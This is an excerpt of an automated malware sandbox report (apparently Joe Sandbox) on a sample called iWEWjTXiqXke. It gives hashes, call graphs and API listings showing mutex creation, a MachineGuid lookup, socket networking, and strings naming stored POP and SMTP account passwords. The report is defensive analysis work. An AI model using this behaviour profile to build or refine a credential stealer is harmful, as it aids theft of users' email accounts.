                                • Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                • Instruction Fuzzy Hash: 14110372404244CFCB01CF40D5C0B16BF71FB94324F24C2A9D8090B696C33AE856CBA1
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1570584230.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_a1d000_iWEWjTXiqXke.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                • Instruction ID: 2bbfa41b65617d84d3b2c05446ab60dae23abdfa872b142463f5112248d0b562
                                • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                • Instruction Fuzzy Hash: 9B119D75504280DFCB15CF54D5C4B95FBB1FB84314F28C6AED8494B696C33AD88ACB61

                                Execution Graph

                                Execution Coverage:3%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:1.3%
                                Total number of Nodes:302
                                Total number of Limit Nodes:13
                                execution_graph 8943 408952 8964 40823f 8943->8964 8946 408960 8948 4056bf 2 API calls 8946->8948 8949 40896a 8948->8949 8992 408862 8949->8992 8951 4089c4 8952 413aca 4 API calls 8951->8952 8953 4089d4 8952->8953 8955 405695 2 API calls 8953->8955 8954 408975 8954->8951 9000 4087d6 8954->9000 8957 4089df 8955->8957 8962 402bab 2 API calls 8963 40899d 8962->8963 8963->8951 8963->8962 8965 40824d 8964->8965 8966 40831b 8965->8966 8967 4031e5 3 API calls 8965->8967 8966->8946 8980 4083bb 8966->8980 8968 40826d 8967->8968 8969 4031e5 3 API calls 8968->8969 8970 408289 8969->8970 8971 4031e5 3 API calls 8970->8971 8972 4082a5 8971->8972 8973 4031e5 3 API calls 8972->8973 8974 4082c1 8973->8974 8975 4031e5 3 API calls 8974->8975 8976 4082e2 8975->8976 8977 4031e5 3 API calls 8976->8977 8978 4082ff 8977->8978 8979 4031e5 3 API calls 8978->8979 8979->8966 9028 408363 8980->9028 8983 4084ab 8983->8946 8984 4056bf 2 API calls 8989 4083f4 8984->8989 8985 408492 8986 413aca 4 API calls 8985->8986 8987 4084a0 8986->8987 8988 405695 2 API calls 8987->8988 8988->8983 8989->8985 9031 40815d 8989->9031 9046 40805d 8989->9046 9061 404b8f 8992->9061 8994 40887e 8995 4031e5 3 API calls 8994->8995 8996 40893e 8994->8996 8998 408946 8994->8998 8999 402b7c 2 API calls 8994->8999 8995->8994 9064 404a39 8996->9064 8998->8954 8999->8994 9001 402b7c 2 API calls 9000->9001 9002 4087e7 9001->9002 9003 4031e5 3 API calls 9002->9003 9005 40885a 9002->9005 9007 408802 9003->9007 9004 402bab 2 API calls 9004->9005 9012 408749 9005->9012 9008 40884d 9007->9008 9011 408853 9007->9011 9073 408522 9007->9073 9077 4084b4 9007->9077 9080 4084d4 9008->9080 9011->9004 9013 404b8f 3 API calls 9012->9013 9014 408765 9013->9014 9015 4031e5 3 API calls 9014->9015 9016 408522 3 API calls 9014->9016 9017 4087c7 9014->9017 9019 4087cf 9014->9019 9015->9014 9016->9014 9018 404a39 4 API calls 9017->9018 9018->9019 9020 4085d1 9019->9020 9021 4086c2 9020->9021 9024 4085e9 9020->9024 9021->8963 9023 402bab 2 API calls 9023->9024 9024->9021 9024->9023 9025 4031e5 3 API calls 9024->9025 9086 4089e6 9024->9086 9105 4086c9 9024->9105 9109 4036a3 9024->9109 9025->9024 9029 4031e5 3 API calls 9028->9029 9030 408386 9029->9030 9030->8983 9030->8984 9032 40816f 9031->9032 9033 4081b6 9032->9033 9034 4081fd 9032->9034 9045 4081ef 9032->9045 9036 405872 4 API calls 9033->9036 9035 405872 4 API calls 9034->9035 9037 408213 9035->9037 9038 4081cf 9036->9038 9039 405872 4 API calls 9037->9039 9040 405872 4 API calls 9038->9040 9041 408222 9039->9041 9042 4081df 9040->9042 9043 405872 4 API calls 9041->9043 9044 405872 4 API calls 9042->9044 9043->9045 9044->9045 9045->8989 9047 40808c 9046->9047 9048 4080d2 9047->9048 9049 408119 9047->9049 9060 40810b 9047->9060 9050 405872 4 API calls 9048->9050 9051 405872 4 API calls 9049->9051 9052 4080eb 9050->9052 9053 40812f 9051->9053 9054 405872 4 API calls 9052->9054 9055 405872 4 API calls 9053->9055 9056 4080fb 9054->9056 9057 40813e 9055->9057 9058 405872 4 API calls 9056->9058 9059 405872 4 API calls 9057->9059 9058->9060 9059->9060 9060->8989 9067 404a19 9061->9067 9070 4049ff 9064->9070 9066 404a44 9066->8998 9068 4031e5 3 API calls 9067->9068 9069 404a2c 9068->9069 9069->8994 9071 4031e5 3 API calls 9070->9071 9072 404a12 RegCloseKey 9071->9072 9072->9066 9074 408534 9073->9074 9076 4085af 9074->9076 9083 4084ee 9074->9083 9076->9007 9078 4031e5 3 API calls 9077->9078 9079 4084c7 9078->9079 9079->9007 9081 4031e5 3 API calls 9080->9081 9082 4084e7 9081->9082 9082->9011 9084 4031e5 3 API calls 9083->9084 9085 408501 9084->9085 9085->9076 9087 4031e5 3 API calls 9086->9087 9088 408a06 9087->9088 9089 4031e5 3 API calls 9088->9089 9093 408b21 9088->9093 9092 408a32 9089->9092 9090 408b17 9121 403649 9090->9121 9092->9090 9112 403666 9092->9112 9093->9024 9096 408b0e 9118 40362f 9096->9118 9098 4031e5 3 API calls 9099 408a88 9098->9099 9099->9096 9100 4031e5 3 API calls 9099->9100 9101 408ac4 9100->9101 9102 405b6f 5 API calls 9101->9102 9103 408aff 9102->9103 9103->9096 9115 408508 9103->9115 9106 4086e2 9105->9106 9108 408744 9105->9108 9107 405872 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 9106->9107 9106->9108 9107->9106 9108->9024 9110 4031e5 3 API calls 9109->9110 9111 4036b5 9110->9111 9111->9024 9113 4031e5 3 API calls 9112->9113 9114 403679 9113->9114 9114->9096 9114->9098 9116 4031e5 3 API calls 9115->9116 9117 40851b 9116->9117 9117->9096 9119 4031e5 3 API calls 9118->9119 9120 403642 9119->9120 9120->9090 9122 4031e5 3 API calls 9121->9122 9123 40365c 9122->9123 9123->9093 8101 402c1f 8102 4031e5 3 API calls 8101->8102 8103 402c31 LoadLibraryW 8102->8103 8060 405924 8063 4031e5 8060->8063 8064 4031f3 8063->8064 8065 403236 8063->8065 8064->8065 8067 403208 8064->8067 8074 4030a5 8065->8074 8080 403263 8067->8080 8069 4031e5 3 API calls 8071 403258 8069->8071 8070 40320d 8070->8071 8072 4030a5 3 API calls 8070->8072 8073 403224 8072->8073 8073->8069 8073->8071 8086 402ca4 8074->8086 8076 4030b0 8077 4030b5 8076->8077 8090 4030c4 8076->8090 8077->8073 8081 40326d 8080->8081 8085 4032b7 8081->8085 8099 402b7c GetProcessHeap HeapAlloc 8081->8099 8083 40328c 8084 402b7c 2 API calls 8083->8084 8084->8085 8085->8070 8087 403079 8086->8087 8089 40307c 8087->8089 8094 40317b GetPEB 8087->8094 8089->8076 8091 4030eb 8090->8091 8093 4030c0 8091->8093 8096 402c03 8091->8096 8093->8073 8095 40319b 8094->8095 8095->8089 8097 4031e5 3 API calls 8096->8097 8098 402c15 8097->8098 8098->8093 8100 402b98 8099->8100 8100->8083 8104 4139de 8113 413855 8104->8113 8106 4139f1 8107 413838 GetProcessHeap HeapAlloc GetPEB 8106->8107 8110 4139f7 8107->8110 8108 413866 21 API calls 8109 413a2d 8108->8109 8111 413b81 GetProcessHeap HeapAlloc GetPEB ExitProcess 8109->8111 8110->8108 8112 413a34 8111->8112 8114 4031e5 3 API calls 8113->8114 8115 413864 8114->8115 8115->8115 8059 404df3 WSAStartup 10666 40f980 10681 413c87 10666->10681 10668 40fa19 10669 40fa08 10670 402bab 2 API calls 10669->10670 10670->10668 10671 40f993 10671->10668 10671->10669 10672 40429b 3 API calls 10671->10672 10673 40f9ca 10672->10673 10703 4060bd 10673->10703 10678 412093 6 API calls 10679 40f9f6 10678->10679 10680 412093 6 API calls 10679->10680 10680->10669 10721 413d97 10681->10721 10684 404056 5 API calls 10686 413cad 10684->10686 10685 413c9f 10685->10671 10686->10685 10687 405b6f 5 API calls 10686->10687 10689 413d10 10687->10689 10688 413d7b 10692 402bab 2 API calls 10688->10692 10689->10688 10690 403c62 3 API calls 10689->10690 10691 413d1f 10690->10691 10691->10688 10693 413d5a 10691->10693 10694 413d2c 10691->10694 10692->10685 10696 405b6f 5 API calls 10693->10696 10695 405dc5 3 API calls 10694->10695 10697 413d33 10695->10697 10698 413d55 10696->10698 10697->10698 10700 405b6f 5 API calls 10697->10700 10699 402bab 2 API calls 10698->10699 10699->10688 10701 413d48 10700->10701 10702 402bab 2 API calls 10701->10702 10702->10698 10704 4031e5 3 API calls 10703->10704 10705 4060dd 10704->10705 10706 406126 10705->10706 10707 4031e5 3 API calls 10705->10707 10706->10669 10710 40650a 10706->10710 10708 40610f 10707->10708 10784 40604f 10708->10784 10711 4060ac 3 API calls 10710->10711 10712 406519 10711->10712 10713 4031e5 3 API calls 10712->10713 10714 406529 10713->10714 10715 406599 10714->10715 10716 4031e5 3 API calls 10714->10716 10715->10678 10717 406544 10716->10717 10718 40657f 10717->10718 10720 4031e5 3 API calls 10717->10720 10719 403c40 3 API calls 10718->10719 10719->10715 10720->10718 10722 413da0 10721->10722 10725 413c96 10721->10725 10727 4065a2 10722->10727 10725->10684 10725->10685 10726 405dc5 3 API calls 10726->10725 10742 404a52 10727->10742 10729 406638 10729->10725 10729->10726 10730 4065c0 10730->10729 10754 40393f 10730->10754 10733 406631 10734 402bab 2 API calls 10733->10734 10734->10729 10735 4059d8 3 API calls 10736 4065e9 10735->10736 10738 402b7c 2 API calls 10736->10738 10741 40662a 10736->10741 10737 402bab 2 API calls 10737->10733 10739 4065f8 10738->10739 10740 402bab 2 API calls 10739->10740 10740->10741 10741->10737 10743 402b7c 2 API calls 10742->10743 10745 404a65 10743->10745 10744 404ac6 10744->10730 10745->10744 10746 4031e5 3 API calls 10745->10746 10747 404a8a RegOpenKeyExA 10746->10747 10748 404aa0 10747->10748 10749 404aca 10747->10749 10750 4031e5 3 API calls 10748->10750 10751 402bab 2 API calls 10749->10751 10752 404ab1 RegQueryValueExA 10750->10752 10751->10744 10753 404a39 4 API calls 10752->10753 10753->10744 10761 403843 10754->10761 10757 403969 10757->10733 10757->10735 10759 403961 10760 402bab 2 API calls 10759->10760 10760->10757 10762 403861 10761->10762 10763 402b7c 2 API calls 10762->10763 10765 403875 10763->10765 10764 403923 10764->10757 10780 403aef 10764->10780 10765->10764 10766 4031e5 3 API calls 10765->10766 10767 40389b 10766->10767 10767->10764 10768 4031e5 3 API calls 10767->10768 10769 4038c5 10768->10769 10770 40392a 10769->10770 10772 403666 3 API calls 10769->10772 10771 403649 3 API calls 10770->10771 10771->10764 10773 4038e7 10772->10773 10773->10770 10774 4031e5 3 API calls 10773->10774 10775 403901 10774->10775 10775->10770 10776 403911 10775->10776 10777 40362f 3 API calls 10776->10777 10778 403919 10777->10778 10779 403649 3 API calls 10778->10779 10779->10764 10781 403afc 10780->10781 10782 402b7c 2 API calls 10781->10782 10783 403b16 10782->10783 10783->10759 10785 4031e5 3 API calls 10784->10785 10786 406062 10785->10786 10786->10706

                                Control-flow Graph

                                APIs
                                • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                • GetLastError.KERNEL32 ref: 0041399E
                                Memory Dump Source
                                • Source File: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_18_2_400000_iWEWjTXiqXke.jbxd
                                Yara matches
                                Similarity
                                • API ID: Error$CreateLastModeMutex
                                • String ID:
                                • API String ID: 3448925889-0
                                • Opcode ID: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
                                • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                • Opcode Fuzzy Hash: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
                                • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                  • Part of subcall function 00402B7C: HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                Memory Dump Source
                                • Source File: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_18_2_400000_iWEWjTXiqXke.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3676486918-0
                                • Opcode ID: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
                                • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                • Opcode Fuzzy Hash: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
                                • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 82 404df3-404e16 WSAStartup
                                APIs
                                • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                Memory Dump Source
                                • Source File: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_18_2_400000_iWEWjTXiqXke.jbxd
                                Yara matches
                                Similarity
                                • API ID: Startup
                                • String ID:
                                • API String ID: 724789610-0
                                • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 83 402c1f-402c37 call 4031e5 LoadLibraryW
                                APIs
                                • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                Memory Dump Source
                                • Source File: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_18_2_400000_iWEWjTXiqXke.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
                                • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                • Opcode Fuzzy Hash: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
                                • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 86 413a3f-413a57 call 4031e5 ExitProcess
                                APIs
                                • ExitProcess.KERNEL32(00000000,00000000,E567384D,00000000,00000000,?,00413B8D,00000000,?,?,004139CC,00000000), ref: 00413A54
                                Memory Dump Source
                                • Source File: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_18_2_400000_iWEWjTXiqXke.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID:
                                • API String ID: 621844428-0
                                • Opcode ID: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
                                • Instruction ID: a51fc36abc950c8e07eb8ba8f8e19e2949325f4e0a3e122df0d5a7568418e784
                                • Opcode Fuzzy Hash: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
                                • Instruction Fuzzy Hash: 52B092B11042087EAA402EF19C05D3B3A4DCA44508B0044357C08E5422E936EE2050A4

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 89 4049ff-404a18 call 4031e5 RegCloseKey
                                APIs
                                • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                Memory Dump Source
                                • Source File: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_18_2_400000_iWEWjTXiqXke.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close
                                • String ID:
                                • API String ID: 3535843008-0
                                • Opcode ID: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
                                • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                • Opcode Fuzzy Hash: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
                                • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                APIs
                                • CoInitialize.OLE32(00000000), ref: 0040438F
                                • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                • VariantInit.OLEAUT32(?), ref: 004043C4
                                • SysAllocString.OLEAUT32(?), ref: 004043CD
                                • VariantInit.OLEAUT32(?), ref: 00404414
                                • SysAllocString.OLEAUT32(?), ref: 00404419
                                • VariantInit.OLEAUT32(?), ref: 00404431
                                Memory Dump Source
                                • Source File: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_18_2_400000_iWEWjTXiqXke.jbxd
                                Yara matches
                                Similarity
                                • API ID: InitVariant$AllocString$CreateInitializeInstance
                                • String ID:
                                • API String ID: 1312198159-0
                                • Opcode ID: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
                                • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                • Opcode Fuzzy Hash: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
                                • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                Strings
                                Memory Dump Source
                                • Source File: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_18_2_400000_iWEWjTXiqXke.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                • API String ID: 0-2111798378
                                • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                • HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                Memory Dump Source
                                • Source File: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_18_2_400000_iWEWjTXiqXke.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocProcess
                                • String ID:
                                • API String ID: 1617791916-0
                                • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                APIs
                                • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                Memory Dump Source
                                • Source File: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_18_2_400000_iWEWjTXiqXke.jbxd
                                Yara matches
                                Similarity
                                • API ID: recv
                                • String ID:
                                • API String ID: 1507349165-0
                                • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                Memory Dump Source
                                • Source File: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_18_2_400000_iWEWjTXiqXke.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_18_2_400000_iWEWjTXiqXke.jbxd
                                Yara matches
                                Similarity
                                • API ID: _wmemset$ErrorLast
                                • String ID: IDA$IDA
                                • API String ID: 887189805-2020647798
                                • Opcode ID: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
                                • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                • Opcode Fuzzy Hash: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
                                • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                                APIs
                                • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                • socket.WS2_32(?,?,?), ref: 00404E7A
                                • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                Memory Dump Source
                                • Source File: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_18_2_400000_iWEWjTXiqXke.jbxd
                                Yara matches
                                Similarity
                                • API ID: freeaddrinfogetaddrinfosocket
                                • String ID:
                                • API String ID: 2479546573-0
                                • Opcode ID: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
                                • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                • Opcode Fuzzy Hash: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
                                • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98